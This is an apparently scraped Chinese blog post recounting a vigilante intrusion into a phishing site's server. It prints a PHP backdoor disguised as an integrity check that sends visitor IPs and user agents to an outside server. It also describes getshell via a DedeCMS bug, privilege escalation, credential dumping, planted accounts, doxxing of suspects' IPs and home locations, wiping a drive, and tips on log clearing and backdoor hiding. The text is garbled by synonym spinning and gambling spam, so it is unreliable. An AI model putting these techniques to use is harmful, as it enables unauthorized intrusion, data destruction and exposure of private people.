|
手艺频道
金沙jsc线路检测
|
51CTO旗下网站
|
|
挪动端
js5金沙6038

由小蜜斯夸耀引发的一次垂纶网站入侵并溯源

本文所写的内容根基实在,但有些渗出溯源的历程为了形貌的精简被修正删除。一些可有可无的事变也被略去,但对渗出至关重要的大思绪和小细节我皆出放过。

作者:drivertom泉源:|2019-03-26 08:52

本文所写的内容根基实在,但有些渗出溯源的历程为了形貌的精简被修正删除。一些可有可无的事变也被略去,但对渗出至关重要的大思绪和小细节我皆出放过。同时在渗出的时刻我没有留下截图,许多图是我厥后补上的。

1. 引子

事变要从一周前提及。

深夜,卧室,我按例空虚寥寂百无聊赖天刷群。

忽然看到 D小姐姐 在群内里道她用了 N 线程给垂纶网站交了大量渣滓信息,最初卡爆了服务器,很是自满。

当晚我恰好闲着没事,便决意小小天冒犯一下这个垂纶网站,故事便如许最先了

2. 入侵

起首是根蒂根基的信息搜集,然则当我查询 whois 和微步在线以后却没有任何效果,显现的是这些注册信息被珍爱了,毫无效果。最初只晓得统一台服务器上运转 了许多雷同的垂纶站。

幸亏 D小姐姐 的渣滓数据并没有给服务器形成太大影响,很快服务器便规复了并显现以下界面

如今的垂纶网站的制作者皆很良知,界面弄得跟官方的异常类似,可不像昔时那些随意绘个框框便等着要暗码的,究竟结果时期在前进嘛。但那也不是完善的,暗码那里弄成小写 qq 的了。

翻看垂纶网址 :http://timea.icu/Ru_op/newwap.html

的源码,我们能够看到作者用了 document.write(unescape(' 去掩盖网页源码,应该是用来防备被基于关键字阻拦的防欺骗软件阻拦?

并且网页内里借援用了个风趣的 JS

  1. window.onload=function() { 
  2.     var date_time='2019-4-2 18:00:59'
  3.     
  4.    var time=Date.parse(newDate()); 
  5.    var date1=Date.parse(newDate(date_time.replace(/-/g, '/'))); 
  6.    if(date1<time) { 
  7.        top.location.href='/expire.html'
  8.   }; 
  9.   $('#expire-time').html(date_time); 
  10. }; 

也许就是一段时间后这个网站便 "expire" 失落了,而 expire.html 少这个模样。

那应当阐明这个网站不是垂纶者本身做的而是费钱买来的。如今不愧是社会主义市场经济啊,这些搞黑产的曾经弄成一个产业链了,有的人卖力做网站有的人卖力骗,合作明白各司其职高效事情呢。

接着在搜检没有 WAF 后便在登录处阻拦 POST 包,扔到 sqlmap 内里注入

果然毫无不测天失利了。那岁首,连垂纶站皆这么平安了。

我再用 Burp 扫了下途径,发明了几个风趣的途径。

那是我方才补的图,正本这些途径内里另有 phpmyadmin 的然则在后去管理员换了途径以是如今出了。我先实验了 phpmyadmin 的强暗码,然则失利了,转去看其余途径

最风趣的是在 /membe r途径中

没想到那一个简简单单的垂纶站需求用到一个 DedeCMS ?

我便随手下了个 DedeCMS 的源码看看,发明背景途径 /dede,点出来竟然有,并且间接用 admin/admin 便登录了!

背景别有洞天,皮肤比 Dede 官方的不晓得悦目到哪里去。若是 Dede 官方有人看到这个内心一定会很羞愧吧。背景借能够看到种种垂纶数据,因为临时它的背景出了些缺点我便不截图了。

不外不管这么道那只是套了层皮罢了,内核照样 DedeCMS,我便在 SecWIKI 的 CMS Hunter 搜了个 DedeCMS 背景提权破绽 《DedeCMS V5.7 SP2背景存在代码实行破绽》:

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS%20V5.7%20SP2%E5%90%8E%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

,便胜利 getshell 了

2. 第一次不端庄溯源

是时刻把垂纶者的IP弄出来了!

想一想垂纶者会怎样接见?固然是接见背景了!因而我在背景的 login.php 加上了以下代码去纪录 IP

  1. //检测安装目次完整性 
  2. function Check($url) 
  3.       $ch=curl_init(); 
  4.       curl_setopt( $ch, CURLOPT_URL, $url); 
  5.       curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1); 
  6.       curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'GET'); 
  7.       curl_setopt( $ch, CURLOPT_TIMEOUT, 60); 
  8.       $result=curl_exec( $ch); 
  9.       curl_close( $ch); 
  10.       return $result; 
  11. $url="http://...:/message.php?info=Another%20"
  12. $info=urlencode((string)$_SERVER['REMOTE_ADDR'].(string)$_SERVER['HTTP_USER_AGENT']); 
  13. Check($url.$info); 

个中这个吸收的服务器是拿S神的服务器干的,他为了检测菜刀流量的行动专门搭建了个服务器供我们去日。

如许我在服务器上面接见/便能够看到 IP 了

惋惜好像我愉快得太早,一天下去发明登过这个背景的人遍及全国各地,预计是全国各地皆有公理黑客想要干这个网站吧,但如许攻击者的 IP 便被藏起来了

看来我需求提权,进入服务器,拿到更多器械!

3. 提权

在提权之前我借干了个事变,就是生存整站源码以查找要害信息以免一会万一消息太大大概搞崩服务器致使惊扰管理员权限丧失我好歹能留点纪念品。

进入 webshell 发明下令实行的函数皆被制止了,起首要处理下令实行的题目。许多人以为下令实行函数被制止便万事大吉 了,但接下来的事变证实这是错的。

制止下令实行函数不过就是在 php.ini 内里设置 disable_functions,当我的 shell 可以或许修正这个 php.ini 的时刻,这个所谓的防护便变得出有意义了。

实行 whoami 下令发明权限只要 iis apppoolwww。这个权限低的难以忍受,我得想办法提权。我祭出了提权后渗出大杀器 Metasploit

上传用 msf 天生的木马,本身的服务器再设置好监听,webshell 实行,胜利获得 meterpreter 会话!以后一记 Ms16-075 破绽拿到 system 权限!

4. 第二次端庄的溯源

在拿到服务器权限后,我用 mimikatz 拿到了管理员明文暗码

然则保险起见我照样先新建一个用户(就是上图的 360safe),以免到时刻登上去把管理员挤下去的为难状态

然后用一个下令把远程桌面的端口查出来

  1. C:Windowssystem32>regquery"hklmSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"/v"PortNumber" 
  2. regquery"hklmSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"/v"PortNumber" 
  3.  
  4. HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp 
  5.    PortNumber   REG_DWORD   0x58d4 

最初胜利登录远程桌面!

js5金沙6038

登录远程桌面后我发明电脑上险些出装什么软件,除个浮屠中便没有其余了

我先搜集了 Windows 日记,在日记中我发明了一些的器械

起首呢,异常不幸,我在最最先用 msf 提权的时刻清算了日记,那是我的大失误,致使 3 月 10 日之前的日记皆出了。然则不幸中的万幸是,残余的日记足矣资助我们找到攻击者的一些信息。

这个攻击者的电脑名字叫做“阿洲”,听起来像是港台片内里的黑社会,IP 地点拿到了两个,一个是 119.85.162.18(中国重庆重庆合川区龙湖美岸(住宅小区)(可信度:99))

另有一个是 119.85.166.235(中国 重庆 重庆 合川区)胜利定位!

服务器上借装有浮屠,因为我其实不晓得浮屠的暗码,便间接修正了内里的 php 文件,把暗码判断那边修正了下逻辑,如许只要我的用户名是 360safe 便能(是的,我有一次借刀 360)登录。

在登陆后我看到背景日记,有看到了一个 IP:119.85.164.184 (中国重庆重庆合川区美绿居·翡翠名苑(住宅小区)(可信度:99))应该是统一小我私家

同时背景借告诉我C盘有个 HTTP 日记纪录,我敏捷下下去,有一次发明了重庆的 IP 地点接见了 /install 页面。

借看到了他用的浏览器是 Windows8.1 用的是 Chrome 浏览器,这个只管取我之前页面钓到的 UA 不一样,但因为都是 win8.1 如许较为少见的体系,故判断为统一小我私家

另一方面我借发明了另一个广东的 IP: 117.136.39.239(基站IP)疑似朋友,他运用 2345 浏览器和 windows7 体系,第一次接见这个体系便间接接见 /dede,而且常常在背景发送 POST 包。

除这些信息以外我便获得不了其余信息了。

5. 运用了 0day 的不完全溯源

厥后某一天课上完的时刻,我问了先生业界大牛Dr,大牛告诉我能够挖下讯边沿业务的 JSONP 破绽去走漏攻击者的 QQ。

在实验了好几个小时以后,我只挖到了讯的某个可以或许走漏用户名的 JSONP 和度可以或许走漏局部用户名的 JSONP 破绽,我很快将这个破绽写成应用剧本,在调试后布置上去获得广东朋友的 QQ 名字“龙腾九天”和“怪兽”

0x06 格盘跑路

因为我着实没有更多工夫和他们耗,再耗下去我就要挂科了,决意间接损坏形成肉体袭击!

闭您的服务!

格您的D 盘!

改您的桌面!

(美中不足的是微博二字打错了)

(附注:脏话仅用于玩梗,其实不代表作者本人日常平凡的本质,我的朋友们皆能够作证)

没有截图的是我清算日记的局部,那一部分我是做了的只是没有截图,期望列位在做雷同事变的时刻注重小我私家珍爱

7. 总结

一些需求注重的渗出细节:

  • 在渗出的时刻若是能修正 php.ini 便能够打破 PHP 制止实行高危函数形成的下令弗成实行。搞 IPS 的时刻能够制止 PHP 修正敏感文件去停止开端防护
  • 扫目次挺有效的
  • 不管是哪种取证,体系日记都是很重要的突破口。同时防取证得删掉日记
  • Windows Server 暗码复杂度有要求,渗出时账户建立失利能够是暗码不敷庞大

不足之处:

1、文中内容是精简过的。全部阵线托的太长。要积聚履历

2、留后门留得太显着,应当留到网站原有的文件里去,最好是散布在多个文件来免杀

3、得积聚 JSONP 破绽,不要像我如许现挖。我皆在思索写一个扫描 JSONP 破绽的插件了

4、得积聚一些针对海内软件(如浮屠)的信息搜集工

【编纂推荐】

【责任编辑:赵宁宁 TEL:(010)68476606】金沙jsc线路检测

点赞 0
  •     
分享:
人人皆在看
猜您喜好

编纂推荐

热点
聚焦
存眷
头条
热点
24H热文
一周话题
本月最赞

定阅专栏

优化运维流水线
共3章 | youerning

198人定阅进修

IT人的职场心法金沙jsc线路检测
共22章 | Bear_Boss4787.com

79人定阅进修

运维标配手艺
共15章 | one叶孤舟

199人定阅进修

视频课程

讲师:20967人进修过

讲师:3229人进修过

讲师:17846人进修过

CTO品牌

最新专题

www.js31.com
精选博文
论坛热帖
下载排行

读 书

本书固然是《网管员必读—网络运用》的改版,但它绝不是简朴的修正,而是完完全全的重写,内容更适用、更专业。全书共9章,13个巨细计划,...

定阅51CTO邮刊

51CTO服务号

51CTO播客